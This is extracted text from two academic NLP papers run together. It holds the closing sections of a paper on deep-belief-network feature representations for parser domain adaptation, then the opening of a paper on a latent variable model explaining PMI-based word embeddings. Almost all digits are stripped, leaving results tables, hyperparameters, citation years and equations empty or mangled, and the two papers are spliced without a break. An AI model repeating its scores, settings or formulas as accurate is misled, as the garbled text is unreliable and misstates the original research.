excerpts from fic- tions or stories, which are similar to the test data. although the unlabeled data is actually annotated in release of the penn treebank, we do not use any information contained in the annotation, only using the raw texts. the training, test and unlabeled data contains , , and sentences respec- tively. . . settings of our dbn model for the syntactic parsing task, there are , original features in total. we use , hidden vari- ables in the first layer and , hidden variables in the second layer. for semantic parsing, there are , , original features. we use , hidden variables in the first layer and , hidden variables in the second layer. in our dbn models, we need to determine the number of groups k. because larger k means less computational cost, k should not be set too small. we empirically set k as follows: according to our experience, each group should contain about original features. 
we have about original fea- tures in our tasks. so we estimate k ≈ / = . and we set k to be in the dbn models for both syntactic and semantic parsing. as for split- ting strategy, we use the more sophisticated one in subsection . . because it should generate better re- sults than the simple one. . . details of dbn training in greedy pretraining of the dbn, the contrastive divergence algorithm is configured as follows: the training data is divided to mini-batches, each con- taining samples. the weights are updated with a learning rate of . , momentum of . , weight de- cay of . . each layer is trained for passes (epochs) over the entire training data. in fine-tuning, the backpropagation algorithm is configured as follows: the training data is divided to mini-batches, each containing samples. the weights are updated with a learning rate of . , mo- mentum of . , weight decay of . . the fine- tuning is repeated for epochs over the entire train- ing data. we use the fast computing technique in raina et al., ( ) to learn the lfrs. moreover, in greedy pretraining, we train rbms in the first layer in par- allel. . results and discussion we use the official evaluation measures of the conll shared task, which consist of three dif- ferent scores: (i) syntactic dependencies are scored using the labeled attachment score, (ii) semantic de- pendencies are evaluated using a labeled f score, and (iii) the overall task is scored with a macro av- test data system las sem f macro f wsj ori . . . lat . . . brown ori . . . lat . . . table : the results of our basic and adapted systems erage of the two previous scores. the three scores above are represented by las, sem f , and macro f respectively in this paper. . . comparison with un-adapted system our basic system uses the orisynmodel for syn- tactic parsing, and the orisemmodel for semantic parsing. our adapted system uses the latsynmodel for syntactic parsing, and the latsemmodel for se- mantic parsing. the results of these two systems are shown in table , in which our basic and adapted systems are denoted as ori and lat respectively. from the results in table , we can see that lat performs slightly worse than ori on in-domain wsj test data. but on the out-of-domain brown test data, lat performs much better than ori, with points im- provement in macro f score. this shows the effec- tiveness of our method for domain adaptation tasks. . . different splitting configurations as described in subsection . . , we have em- pirically set the number of groups k to be and chosen the more sophisticated splitting strategy. in this subsection, we experiment with different split- ting configurations to see their effects. under each splitting configuration, we learn the lfrs using our the dbn models. using the lfrs, we test the our adapted systems on both in-domain and out-of-domain data. therefore we get many test results, each corresponding to a splitting configura- tion. the in-domain and out-of-domain test results are reported in table and table respectively. in these two tables, ‘s ’ and ‘s ’ represents the sim- ple and the more sophisticated splitting strategies in subsection . . respectively. ‘k’ represents the number of groups in our dbn models. for both syntactic and semantic parsing, we use the same k in their dbn models. the ‘time’ column reports the training time of our dbn models for both syn- tactic and semantic parsing. the unit of the ‘time’ str k time(h) las sem f macro f s . . . . . . . . . . . . s . . . . . . . . . . . . 
table : results of different splitting configurations on in-domain wsj development data str k time(h) las sem f macro f s . . . . . . . . . . . . s . . . . . . . . . . . . table : results of different splitting configurations on out-of-domain brown test data column is the hour. please note that we only need to train our dbn models once. and we report the training time in table . for easy viewing, we re- peat those training times in table . but this does not mean we need to train new dbn models for out- of-domain test. from tables and we get the following obser- vations: first, although the more sophisticated splitting strategy ‘s ’ generate slightly better result than the simple strategy ‘s ’, the difference is not signifi- cant. this means that the hierarchical structure of our dbn model can robustly capture the relation- ships between features. even with the simple split- ting strategy ‘s ’, we still get quite good results. second, the ‘time’ column in table shows that different splitting strategies with the same k value has the same training time. this is reasonable be- cause training time only depends on the number of parameters in our dbn model. and different split- ting strategies do not affect the number of parame- ters in our dbn model. third, the number of groups k affects both the training time and the final results. when k increases, the training time reduces but the results degrade. as k gets larger, the time reduction gets less obvious, but the degradation of results gets more obvious. when k = , , , there is not much differ- ence between the results. this shows that the results of our dbn model is not sensitive to the values of k within a range of around our initial estima- tion . but when k is further away from our es- timation, e.g. k = , the results get significantly worse. please note that the results in tables and are not used to tune the parameter k or to choose a split- ting strategy in our dbn model. as mentioned in subsection . . , we have chosen k = and the more sophisticated splitting strategy beforehand. in this paper, we always use the results with k = and the ‘s ’ strategy as our main results, even though the results with k = are better. . the size of unlabeled target domain data an interesting question for our method is how much unlabeled target domain data should be used. to em- pirically answer this question, we learn several lfrs by gradually adding more unlabeled data to train our dbn model. we compared the performance of these lfrs as shown in figure . target domain test source domain test figure : macro f scores on test data with respect to the size of unlabeled target domain data used in dbn train- ing. the horizontal axis is the number of sentences in unlabeled target domain data and the coordinate axis is the macro f score. from figure , we can see that by adding more unlabeled target domain data, our system adapts bet- ter to the target domain with only small degradation of result on source domain. however, with more un- labeled data used, the improvement on target domain result gradually gets smaller. . comparison with other methods in this subsection, we compare our method with sev- eral systems. these are described below. daume . daumé iii ( ) proposed a simple and effective adaptation method by augmenting fea- ture vector. its main idea is to augment the feature vector. they took each feature in the original prob- lem and made three versions of it: a general version, a source-specific version and a target-specific ver- sion. 
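a minimal sketch of that augmentation is given below (hypothetical helper; which copies end up in the source and target data is spelled out in the next paragraph).

```python
def augment(features, domain):
    """Daume III's feature augmentation: each original feature is
    duplicated into a 'general' copy and a domain-specific copy, so
    source-domain examples carry general + source-specific features and
    target-domain examples carry general + target-specific features."""
    out = []
    for f in features:
        out.append(("general", f))
        out.append((domain, f))   # domain is "source" or "target"
    return out

# e.g. augment(["pos=NN", "form=bank"], "source")
```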
thus, the augmented source data contains only general and source-specific versions; the augmented target data contains general and target-specific ver- sions. in the baseline system, we adopt the same technique for dependency and semantic parsing. chen. the participation system of zhao et al., ( ), reached the best result in the out-of-domain test of the conll shared task. in daumé iii and and marcu ( ), they pre- sented and discussed several ‘obvious’ ways to at- tack the domain adaptation problem without devel- oping new algorithms. following their idea, we con- struct similar systems. onlysrc. the system is trained on only the data of the source domain (news). onlytgt. the system is trained on only the data of the target domain (fiction). all. the system is trained on all data of the source domain and the target domain. it is worth noting that training the systems of daume , onlytgt and all need the labeled data of the target domain. we utilize onlysrc to parse the unlabeled data of the target domain to generate the labeled data. all comparison results are shown in table , in which the ‘diff’ column is the difference of scores on in-domain and out-of-domain test data. first, we compare onlysrc, onlytgt and all. we can see that onlytgt performs very poor both in the source domain and in the target domain. it is not hard to understand that onlytgt performs poor in the source domain because of the adaptation prob- lem. onlytgt also performs poor in the target do- main. we think the main reason is that onlytgt is trained on the auto parsed data in which there are score system wsj brown diff las onlysrc . . . onlytgt . . . all . . . daume . . . chen . . . ours . . . sem f onlysrc . . . onlytgt . . . all . . . daume . . . chen . . . ours . . . macro f onlysrc . . . onlytgt . . . all . . . daume . . . chen . . . ours . . . table : comparison with other methods. many parsing errors. but we note that all performs better than both onlysrc and onlytgt on the target domain test, although its training data contains some auto parsed data. therefore, the data of the target domain, labeled or unlabeled, are potential in alle- viating the adaptation problem of different domains. but all just puts the auto parsed data of the target domain into the training set. thus, its improvement on the test data of the target domain is limited. in fact, how to use the data of the target domain, espe- cially the unlabeled data, in the adaptation problem is still an open and hot topic in nlp and machine learning. second, we compare daume , all and our method. in daume , they reported improvement on the target domain test. but one point to note is that the target domain data used in their experi- ments is labeled while in our case there is only un- labeled data. we can see daume have compara- ble performance with all in which there is not any adaptation strategy besides adding more data of the target domain. we think the main reason is that there are many parsing errors in the data of the tar- get domain. but our method performs much better than daume and all even though some faulty data are also utilized in our system. this suggests that our method successfully learns new robust represen- tations for different domains, even when there are some noisy data. third, we compare chen with our method. chen reached the best result in the out-of-domain test of the conll shared task. the results in table show that chen’s system performs better than ours on in-domain test data, especially on las score. 
chen’s system uses a sophisticated graph-based syn- tactic dependency parser. graph-based parsers use substantially more features, e.g. more than . × features are used in mcdonald et al., ( ). learning an lfr for that many features would take months of time using our dbn model. so at present we only use a transition-based parser. the better per- formance of chen’s system mainly comes from their sophisticated syntactic parsing method. to reduce the sparsity of features, chen’s sys- tem uses word cluster features as in koo et al., ( ). on out-of-domain tests, however, our sys- tem still performs much better than chen’s, espe- cially on semantic parsing. to our knowledge, on out-of-domain tests on this data set, our system has obtained the best performance to date. more im- portantly, the performance difference between indo- main and out-of-domain tests is much smaller in our system. this shows that our system adapts much better to the target domain. conclusions in this paper, we propose a dbn model to learn lfrs for syntactic and semantic parsers. these lfrs are common representations of original fea- tures in both source and target domains. syntactic and semantic parsers using the lfrs adapt to tar- get domain much better than the same parsers us- ing original feature representation. our model pro- vides a unified method that adapts both syntactic and semantic dependency parsers to a new domain. in the future, we hope to further scale up our method to adapt parsing models using substantially more features, such as graph-based syntactic dependency parsing models. we will also search for better split- ting strategies for our dbn model. finally, although our experiments are conducted on syntactic and se- mantic parsing, it is expected that the proposed ap- proach can be applied to the domain adaptation of other tasks with little adaptation efforts. acknowledgements the research work has been partially funded by the natural science foundation of china under grant no. and supported by the west light foundation of chinese academy of sciences under grant no.lhxz . we thank the three anony- mous reviewers and the action editor for their help- ful comments and suggestions. references yoshua bengio. . learning deep architectures for ai. in foundations and trends in machine learning, ( ): - . john blitzer, ryan mcdonald and fernando pereira. . domain adaptation with sturctural correspon- dance learning. in proceedings of acl- . wanxiang che, zhenghua li, yuxuan hu, yongqiang li, bing qin, ting liu and sheng li. . a cascaded syntactic and semantic dependency parsing system. in proceedings of conll- shared task. wanxiang che, zhenghua li, yongqiang li, yuhang guo, bing qin and ting liu. . multilingual dependency-based syntactic and semantic parsing. in proceedings of conll- shared task. wenliang chen, youzhengwu and hitoshi isahara. . learning reliable information for dependency parsing adaptation. in proceedings of coling- . hal daumé iii. . frustratingly easy domain adap- tation. in proceedings of acl- . hal daumé iii and daniel marcu. . domain adap- tation for statistical classifer. in journal of artificial intelligence research, ( ), - . mark dredze, john blitzer, partha p. talukdar, kuzman ganchev, joao graca and fernando pereira. . frustratingly hard domain adaptation for depen- dency parsing. in proceedings of emnlp-conll- . xavier glorot, antoine bordes and yoshua bengio. . domain adaptation for large-scale sentiment classification: a deep learning approach. 
in pro- ceedings of international conference on machine learning (icml) . daniel gildea and daniel jurafsky. . automatic la- beling for semantic roles. in computational linguis- tics, ( ): - . i. goodfellow, q. le, a. saxe and a. ng. . mea- suring invariances in deep networks. in proceedings of advances in neural information processing sys- tems(nips) . jan hajič, massimiliano ciaramita, richard johans- son, daisuke kawahara, maria antònia martı́, lluı́s màrquez, adam meyers, joakim nivre, sebastian padó, jan štěpánek, pavel straňák, mihai surdeanu, nianwen xue and yi zhang. . the conll- shared task: syntactic and semantic dependencies in multiple languages. in proceedings of conll- . j. hall, j. nilsson, j. nivre, g. eryiǧit, b. megyesi, m. nilsson, and m. saers. . single malt or blended? a study in multilingual parser optimization. in pro- ceedings of emnlp-conll- . geoffrey hinton. . a practical guide to train- ing restricted boltzmann machines. in technical re- port - , machine learning group, university of toronto. geoffrey hinton. . training products of experts by minimizing constrastive divergence. in neural com- putation, ( ): - . geoffrey hinton, simon osindero and yee-whye teh. . a fast learning algorithm for deep belief nets. in neural computation, ( ): - . geoffrey hinton and r. salakhutdinov. . reducing the dimensionality of data with neural networks. in science, ( ), - . richard johansson and pierre nugues. . dependency-based semantic role labeling of prop- bank. in proceedings of emnlp- . terry koo, xavier carreras and michael collins. . simple semi-supervised dependency parsing. in pro- ceedings of acl-hlt- . lluı́s màrquez, xavier carreras, kenneth c.litkowski and suzanne stevenson. . semantic role label- ing: an introduction to the special issue. in compu- tational linguistics, ( ): - . ryan mcdonald, fernando pereira, jan hajˇc, and kiril ribarov. . non-projective dependency parsing using spanning tree algortihms. in proceedings of naacl-hlt- . j. nivre, j. hall, s. kübler, r. mcdonald, j. nilsson, s. riedel, and d. yuret. . the conll shared task on dependency parsing. in proceedings of conll- . j. nivre, j. hall, j. nilsson, g. eryiǧit and s. marinov. . labeled pseudo-projective dependency parsing with support vector machines. in proceedings of conll- . j. nivre, and j. nilsson. . pseudo-projective depen- dency parsing. in proceedings of acl- . rajat raina, anand madhavan, and andrew y. ng. . large-scale deep unsupervised learning us- ing graphics processors. in proceedings of the th annual international conference on machine learn- ing(icml), pages - . mihai surdeanu, richard johansson, adam meyers, lluı́s màrquez and joakim nivre. . the conll- shared task on joint parsing of syntactic and semantic dependencies. in proceedings of conll- . ivan titov. . domain adaptation by constraining inter-domain variability of latent feature represen- tation. in proceedings of acl- . joseph turian, lev ratinov and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of acl- . j. weston, f. rattle, and r. collobert. . deep learn- ing via semi-supervised embedding. in proceed- ings of international conference on machine learn- ing(icml). nianwen xue and martha palmer. . calibrating fea- tures for semantic role labeling. in proceedings of emnlp- . haitong yang and chengqing zong. . multi- predicate semantic role labeling. in proceedings of emnlp- . hai zhao, wenliang chen, chunyu kit, guodong zhou. . 
multilingual dependency learning: exploiting rich features for tagging syntactic and semantic de- pendencies. in proceedings of conll- shared task. hai zhao and chunyu kit. . parsing syntactic and semantic dependencies with two single-stage max- imum entropy models. in proceedings of conll- . tao zhuang and chengqing zong. a. a minimum error weighting combination strategy for chinese se- mantic role labeling. in proceedings of coling . tao zhuang and chengqing zong. b. joint inference for bilingual semantic role labeling. in proceedings of emnlp . a latent variable model approach to pmi-based word embeddings sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, andrej risteski computer science department, princeton university olden st, princeton, nj {arora,yuanzhil,yingyul,tengyu,risteski}@cs.princeton.edu abstract semantic word embeddings represent the meaning of a word via a vector, and are cre- ated by diverse methods. many use non- linear operations on co-occurrence statistics, and have hand-tuned hyperparameters and reweighting methods. this paper proposes a new generative model, a dynamic version of the log-linear topic model of mnih and hinton ( ). the method- ological novelty is to use the prior to com- pute closed form expressions for word statis- tics. this provides a theoretical justifica- tion for nonlinear models like pmi, word vec, and glove, as well as some hyperparame- ter choices. it also helps explain why low- dimensional semantic embeddings contain lin- ear algebraic structure that allows solution of word analogies, as shown by mikolov et al. ( a) and many subsequent papers. experimental support is provided for the gen- erative model assumptions, the most impor- tant of which is that latent word vectors are fairly uniformly dispersed in space. introduction vector representations of words (word embeddings) try to capture relationships between words as dis- tance or angle, and have many applications in com- putational linguistics and machine learning. they are constructed by various models whose unify- ing philosophy is that the meaning of a word is defined by “the company it keeps” (firth, ), namely, co-occurrence statistics. the simplest meth- ods use word vectors that explicitly represent co- occurrence statistics. reweighting heuristics are known to improve these methods, as is dimension reduction (deerwester et al., ). some reweight- ing methods are nonlinear, which include taking the square root of co-occurrence counts (rohde et al., ), or the logarithm, or the related pointwise mu- tual information (pmi) (church and hanks, ). these are collectively referred to as vector space models, surveyed in (turney and pantel, ). neural network language models (rumelhart et al., ; rumelhart et al., ; bengio et al., ; collobert and weston, a) propose an- other way to construct embeddings: the word vec- tor is simply the neural network’s internal repre- sentation for the word. this method is nonlinear and nonconvex. it was popularized via word vec, a family of energy-based models in (mikolov et al., b; mikolov et al., c), followed by a ma- trix factorization approach called glove (penning- ton et al., ). the first paper also showed how to solve analogies using linear algebra on word em- beddings. experiments and theory were used to sug- gest that these newer methods are related to the older pmi-based models, but with new hyperparameters and/or term reweighting methods (levy and gold- berg, b). but note that even the old pmi method is a bit mysterious. 
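the raw ingredient behind all of these constructions is a windowed co-occurrence count; a minimal sketch follows (the window size and vocabulary handling are illustrative choices, not the exact setup of any cited system).

```python
import numpy as np

def cooccurrence_counts(corpus, vocab, window=5):
    """Count how often word pairs appear within `window` tokens of each
    other. corpus: iterable of token lists; vocab: dict token -> index."""
    counts = np.zeros((len(vocab), len(vocab)))
    for sentence in corpus:
        ids = [vocab[t] for t in sentence if t in vocab]
        for i, w in enumerate(ids):
            for j in range(max(0, i - window), i):
                counts[w, ids[j]] += 1
                counts[ids[j], w] += 1   # keep the matrix symmetric
    return counts
```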
the simplest version considers a sym- metric matrix with each row/column indexed by a word. the entry for (w,w′) is pmi(w,w′) = log p(w,w′) p(w)p(w′) , where p(w,w ′) is the empirical prob- ability of words w,w′ appearing within a window of certain size in the corpus, and p(w) is the marginal transactions of the association for computational linguistics, vol. , pp. – , . action editor: daichi mochihashi. submission batch: / ; revision batch: / ; / ; published / . c© association for computational linguistics. distributed under a cc-by . license. probability of w. (more complicated models could use asymmetric matrices with columns correspond- ing to context words or phrases, and also involve ten- sorization.) then word vectors are obtained by low- rank svd on this matrix, or a related matrix with term reweightings. in particular, the pmi matrix is found to be closely approximated by a low rank ma- trix: there exist word vectors in say dimensions, which is much smaller than the number of words in the dictionary, such that 〈vw,vw′〉≈ pmi(w,w′) ( . ) where ≈ should be interpreted loosely. there appears to be no theoretical explanation for this empirical finding about the approximate low rank of the pmi matrix. the current paper addresses this. specifically, we propose a probabilistic model of text generation that augments the log-linear topic model of mnih and hinton ( ) with dynamics, in the form of a random walk over a latent discourse space. the chief methodological contribution is us- ing the model priors to analytically derive a closed- form expression that directly explains ( . ); see the- orem . in section . section builds on this in- sight to give a rigorous justification for models such as word vec and glove, including the hyperparam- eter choices for the latter. the insight also leads to a mathematical explanation for why these word em- beddings allow analogies to be solved using linear algebra; see section . section shows good empir- ical fit to this model’s assumtions and predictions, including the surprising one that word vectors are pretty uniformly distributed (isotropic) in space. . related work latent variable probabilistic models of language have been used for word embeddings before, includ- ing latent dirichlet allocation (lda) and its more complicated variants (see the survey (blei, )), and some neurally inspired nonlinear models (mnih and hinton, ; maas et al., ). in fact, lda evolved out of efforts in the s to provide a gen- erative model that “explains” the success of older vector space methods like latent semantic index- ing (papadimitriou et al., ; hofmann, ). however, none of these earlier generative models has been linked to pmi models. levy and goldberg ( b) tried to relate word vec to pmi models. they showed that if there were no dimension constraint in word vec, specifically, the “skip-gram with negative sampling (sgns)” version of the model, then its solutions would satisfy ( . ), provided the right hand side were replaced by pmi(w,w′)−β for some scalar β. however, skip-gram is a discriminative model (due to the use of negative sampling), not generative. fur- thermore, their argument only applies to very high- dimensional word embeddings, and thus does not address low-dimensional embeddings, which have superior quality in applications. hashimoto et al. ( ) focuses on issues simi- lar to our paper. they model text generation as a random walk on words, which are assumed to be embedded as vectors in a geometric space. 
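for concreteness, the classical construction described at the start of this section, a pmi matrix followed by a low-rank svd, can be sketched as follows; reweighting and smoothing choices vary in practice, so this is not the exact recipe of any particular system.

```python
import numpy as np

def pmi_svd_embeddings(counts, dim):
    """Build the PMI matrix from symmetric co-occurrence counts and take
    a rank-`dim` factorization so that <v_w, v_w'> roughly matches
    PMI(w, w')."""
    total = counts.sum()
    p_joint = counts / total
    p_word = counts.sum(axis=1) / total
    with np.errstate(divide="ignore", invalid="ignore"):
        pmi = np.log(p_joint / np.outer(p_word, p_word))
    pmi[~np.isfinite(pmi)] = 0.0      # zero the log(0) cells of unseen pairs

    U, S, _ = np.linalg.svd(pmi)
    return U[:, :dim] * np.sqrt(S[:dim])   # rows are the word vectors
```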
given that the last word produced was w, the probability that the next word is w′ is assumed to be given by h(|vw − vw′| ) for a suitable function h, and this model leads to an explanation of ( . ). by contrast our random walk involves a latent discourse vector, which has a clearer semantic interpretation and has proven useful in subsequent work, e.g. understand- ing structure of word embeddings for polysemous words arora et al. ( ). also our work clarifies some weighting and bias terms in the training objec- tives of previous methods (section ) and also the phenomenon discussed in the next paragraph. researchers have tried to understand why vec- tors obtained from the highly nonlinear word vec models exhibit linear structures (levy and goldberg, a; pennington et al., ). specifically, for analogies like “man:woman::king:??,” queen hap- pens to be the word whose vector vqueen is the most similar to the vector vking − vman + vwoman. this suggests that simple semantic relationships, such as masculine vs feminine tested in the above example, correspond approximately to a single direction in space, a phenomenon we will henceforth refer to as relations=lines. section surveys earlier attempts to explain this phenomenon and their shortcoming, namely, that they ignore the large approximation error in rela- tionships like ( . ). this error appears larger than the difference between the best solution and the sec- ond best (incorrect) solution in analogy solving, so that this error could in principle lead to a complete failure in analogy solving. in our explanation, the low dimensionality of the word vectors plays a key role. this can also be seen as a theoretical expla- nation of the old observation that dimension reduc- tion improves the quality of word embeddings for various tasks. the intuitive explanation often given —that smaller models generalize better—turns out to be fallacious, since the training method for cre- ating embeddings makes no reference to analogy solving. thus there is no a priori reason why low- dimensional model parameters (i.e., lower model ca- pacity) should lead to better performance in anal- ogy solving, just as there is no reason they are bet- ter at some other unrelated task like predicting the weather. . benefits of generative approaches in addition to giving some form of “unification” of existing methods, our generative model also brings more intepretability to word embeddings beyond tra- ditional cosine similarity and even analogy solving. for example, it led to an understanding of how the different senses of a polysemous word (e.g., bank) reside in linear superposition within the word em- bedding (arora et al., ). such insight into em- beddings may prove useful in the numerous settings in nlp and neuroscience where they are used. another new explanatory feature of our model is that low dimensionality of word embeddings plays a key theoretical role —unlike in previous papers where the model is agnostic about the di- mension of the embeddings, and the superiority of low-dimensional embeddings is an empirical finding (starting with deerwester et al. ( )). specifically, our theoretical analysis makes the key assumption that the set of all word vectors (which are latent vari- ables of the generative model) are spatially isotropic, which means that they have no preferred direction in space. having n vectors be isotropic in d dimen- sions requires d � n. this isotropy is needed in the calculations (i.e., multidimensional integral) that yield ( . ). 
it also holds empirically for our word vectors, as shown in section . the isotropy of low-dimensional word vectors also plays a key role in our explanation of the relations=lines phenomenon (section ). the isotropy has a “purification” effect that mitigates the effect of the (rather large) approximation error in the pmi models. generative model and its properties the model treats corpus generation as a dynamic process, where the t-th word is produced at step t. the process is driven by the random walk of a dis- course vector ct ∈ <d. its coordinates represent what is being talked about. each word has a (time- invariant) latent vector vw ∈<d that captures its cor- relations with the discourse vector. we model this bias with a log-linear word production model: pr[w emitted at time t | ct] ∝ exp(〈ct,vw〉). ( . ) the discourse vector ct does a slow random walk (meaning that ct+ is obtained from ct by adding a small random displacement vector), so that nearby words are generated under similar discourses. we are interested in the probabilities that word pairs co- occur near each other, so occasional big jumps in the random walk are allowed because they have negligi- ble effect on these probabilities. a similar log-linear model appears in mnih and hinton ( ) but without the random walk. the linear chain crf of collobert and weston ( b) is more general. the dynamic topic model of blei and lafferty ( ) utilizes topic dynamics, but with a linear word production model. belanger and kakade ( ) have proposed a dynamic model for text us- ing kalman filters, where the sequence of words is generated from gaussian linear dynamical systems, rather than the log-linear model in our case. the novelty here over such past works is a the- oretical analysis in the method-of-moments tradi- tion (hsu et al., ; cohen et al., ). assuming a prior on the random walk we analytically integrate out the hidden random variables and compute a sim- ple closed form expression that approximately con- nects the model parameters to the observable joint probabilities (see theorem . ). this is reminis- cent of analysis of similar random walk models in finance (black and scholes, ). model details. let n denote the number of words and d denote the dimension of the discourse space, where ≤ d ≤ n. inspecting ( . ) suggests word this is a different interpretation of the term “discourse” compared to some other settings in computational linguistics. vectors need to have varying lengths, to fit the empir- ical finding that word probabilities satisfy a power law. furthermore, we will assume that in the bulk, the word vectors are distributed uniformly in space, earlier referred to as isotropy. this can be quantified as a prior in the bayesian tradition. more precisely, the ensemble of word vectors consists of i.i.d draws generated by v = s · v̂, where v̂ is from the spher- ical gaussian distribution, and s is a scalar random variable. we assume s is a random scalar with ex- pectation τ = Θ( ) and s is always upper bounded by κ, which is another constant. here τ governs the expected magnitude of 〈v,ct〉, and it is particularly important to choose it to be Θ( ) so that the distribu- tion pr[w|ct] ∝ exp(〈vw,ct〉) is interesting. more- over, the dynamic range of word probabilities will roughly equal exp(κ ), so one should think of κ as an absolute constant like . these details about s are important for realistic modeling but not too impor- tant in our analysis. 
(furthermore, readers uncom- fortable with this simplistic bayesian prior should look at section . below.) finally, we clarify the nature of the random walk. we assume that the stationary distribution of the ran- dom walk is uniform over the unit sphere, denoted by c. the transition kernel of the random walk can be in any form so long as at each step the movement of the discourse vector is at most � / √ d in ` norm. this is still fast enough to let the walk mix quickly in the space. the following lemma (whose proof appears in the appendix) is central to the analysis. it says that un- der the bayesian prior, the partition function zc =∑ w exp(〈vw,c〉), which is the implied normaliza- tion in equation ( . ), is close to some constant z for most of the discourses c. this can be seen as a plausible theoretical explanation of a phenomenon called self-normalization in log-linear models: ig- noring the partition function or treating it as a con- stant (which greatly simplifies training) is known to often give good results. this has also been studied a larger τ will make pr[w|ct] too peaked and a smaller one will make it too uniform. more precisely, the proof extends to any symmetric prod- uct stationary distribution c with sub-gaussian coordinate sat- isfying ec [ ‖c‖ ] = , and the steps are such that for all ct, ep(ct+ |ct)[exp(κ √ d‖ct+ − ct‖)] ≤ + � for some small � . in (andreas and klein, ). lemma . (concentration of partition functions). if the word vectors satisfy the bayesian prior de- scribed in the model details, then pr c∼c [( − �z)z ≤ zc ≤ ( + �z)z] ≥ −δ, ( . ) for �z = õ( / √ n), and δ = exp(−Ω(log n)). the concentration of the partition functions then leads to our main theorem (the proof is in the ap- pendix). the theorem gives simple closed form approximations for p(w), the probability of word w in the corpus, and p(w,w′), the probability that two words w,w′ occur next to each other. the theorem states the result for the window size q = , but the same analysis works for pairs that appear in a small window, say of size , as stated in corollary . . recall that pmi(w,w′) = log[p(w,w′)/(p(w)p(w′))]. theorem . . suppose the word vectors satisfy the inequality ( . ), and window size q = . then, log p(w,w′) = ‖vw + vw′‖ d − log z ± �, ( . ) log p(w) = ‖vw‖ d − log z ± �. ( . ) for � = o(�z) + õ( /d) + o(� ). jointly these imply: pmi (w,w′) = 〈vw,vw′〉 d ±o(�). ( . ) remarks . since the word vectors have ` norm of the order of √ d, for two typical word vectors vw,vw′ , ‖vw + vw′‖ is of the order of Θ(d). there- fore the noise level � is very small compared to the leading term d ‖vw + vw′‖ . for pmi however, the noise level o(�) could be comparable to the leading term, and empirically we also find higher error here. remarks . variants of the expression for joint probability in ( . ) had been hypothesized based upon empirical evidence in mikolov et al. ( b) and also globerson et al. ( ), and maron et al. ( ) . remarks . theorem . directly leads to the ex- tension to a general window size q as follows: corollary . . let pq(w,w′) be the co-occurrence probability in windows of size q, and pmiq(w,w′) be the corresponding pmi value. then log pq(w,w ′) = ‖vw + vw′‖ d − log z + γ ± �, pmiq (w,w ′) = 〈vw,vw′〉 d + γ ±o(�). where γ = log ( q(q− ) ) . it is quite easy to see that theorem . implies the corollary . 
, as when the window size is q the pair w,w′ could appear in any of ( q ) positions within the window, and the joint probability of w,w′ is roughly the same for any positions because the discourse vector changes slowly. (of course, the er- ror term gets worse as we consider larger window sizes, although for any constant size, the statement of the theorem is correct.) this is also consistent with the shift β for fitting pmi in (levy and gold- berg, b), which showed that without dimension constraints, the solution to skip-gram with negative sampling satisfies pmi (w,w′) −β = 〈vw,vw′〉 for a constant β that is related to the negative sampling in the optimization. our result justifies via a genera- tive model why this should be satisfied even for low dimensional word vectors. . weakening the model assumptions for readers uncomfortable with bayesian priors, we can replace our assumptions with concrete proper- ties of word vectors that are empirically verifiable (section . ) for our final word vectors, and in fact also for word vectors computed using other recent methods. the word meanings are assumed to be represented by some “ground truth” vectors, which the experi- menter is trying to recover. these ground truth vec- tors are assumed to be spatially isotropic in the bulk, in the following two specific ways: (i) for almost all unit vectors c the sum ∑ w exp(〈vw,c〉) is close to a constant z; (ii) singular values of the matrix of word vectors satisfy properties similar to those of random matrices, as formalized in the paragraph be- fore theorem . . our bayesian prior on the word vectors happens to imply that these two conditions hold with high probability. but the conditions may hold even if the prior doesn’t hold. furthermore, they are compatible with all sorts of local structure among word vectors such as existence of cluster- ings, which would be absent in truly random vectors drawn from our prior. training objective and relationship to other models to get a training objective out of theorem . , we reason as follows. let xw,w′ be the number of times words w and w′ co-occur within the same window in the corpus. the probability p(w,w′) of such a co-occurrence at any particular time is given by ( . ). successive samples from a random walk are not independent. but if the random walk mixes fairly quickly (the mixing time is related to the log- arithm of the vocabulary size), then the distribution of xw,w′ ’s is very close to a multinomial distribu- tion mul(l̃,{p(w,w′)}), where l̃ = ∑ w,w′ xw,w′ is the total number of word pairs. assuming this approximation, we show below that the maximum likelihood values for the word vectors correspond to the following optimization, min {vw},c ∑ w,w′ xw,w′ ( log(xw,w′ ) −‖vw +vw′‖ −c ) as is usual, empirical performance is improved by weighting down very frequent word pairs, possibly because very frequent words such as “the” do not fit our model. this is done by replacing the weighting xw,w′ by its truncation min{xw,w′,xmax} where xmax is a constant such as . we call this objec- tive with the truncated weights sn (squared norm). we now give its derivation. maximizing the like- lihood of {xw,w′} is equivalent to maximizing ` = log   ∏ (w,w′) p(w,w′)xw,w′   . denote the logarithm of the ratio between the ex- pected count and the empirical count as ∆w,w′ = log ( l̃p(w,w′) xw,w′ ) . ( . ) then with some calculation, we obtain the following where c is independent of the empirical observations xw,w′ ’s. ` = c + ∑ (w,w′) xw,w′ ∆w,w′ ( . 
) on the other hand, using ex ≈ +x+x / when x is small, we have l̃ = ∑ (w,w′) l̃pw,w′ = ∑ (w,w′) xw,w′e ∆w,w′ ≈ ∑ (w,w′) xw,w′ ( + ∆w,w′ + ∆ w,w′ ) . note that l̃ = ∑ (w,w′) xw,w′ , so ∑ (w,w′) xw,w′ ∆w,w′ ≈− ∑ (w,w′) xw,w′ ∆ w,w′. plugging this into ( . ) leads to (c− `) ≈ ∑ (w,w′) xw,w′ ∆ w,w′. ( . ) so maximizing the likelihood is approximately equivalent to minimizing the right hand side, which (by examining ( . )) leads to our objective. objective for training with pmi. a similar ob- jective pmi can be obtained from ( . ), by com- puting an approximate mle, using the fact that the error between the empirical and true value of pmi(w,w′) is driven by the smaller term p(w,w′), and not the larger terms p(w),p(w′). min {vw},c ∑ w,w′ xw,w′ ( pmi(w,w′) −〈vw,vw′〉 ) this is of course very analogous to classical vsm methods, with a novel reweighting method. fitting to either of the objectives involves solving a version of weighted svd which is np-hard, but empirically seems solvable in our setting via ada- grad (duchi et al., ). this taylor series approximation has an error of the order of x , but ignoring it can be theoretically justified as follows. for a large xw,w′ , its value approaches its expectation and thus the corresponding ∆w,w′ is close to and thus ignoring ∆ w,w′ is well justified. the terms where ∆w,w′ is significant corre- spond to xw,w′ ’s that are small. but empirically, xw,w′ ’s obey a power law distribution (see, e.g. pennington et al. ( )) us- ing which it can be shown that these terms contribute a small fraction of the final objective ( . ). so we can safely ignore the errors. full details appear in the arxiv version of this pa- per (arora et al., ). connection to glove. compare sn with the ob- jective used by glove (pennington et al., ): ∑ w,w′ f(xw,w′ )(log(xw,w′ 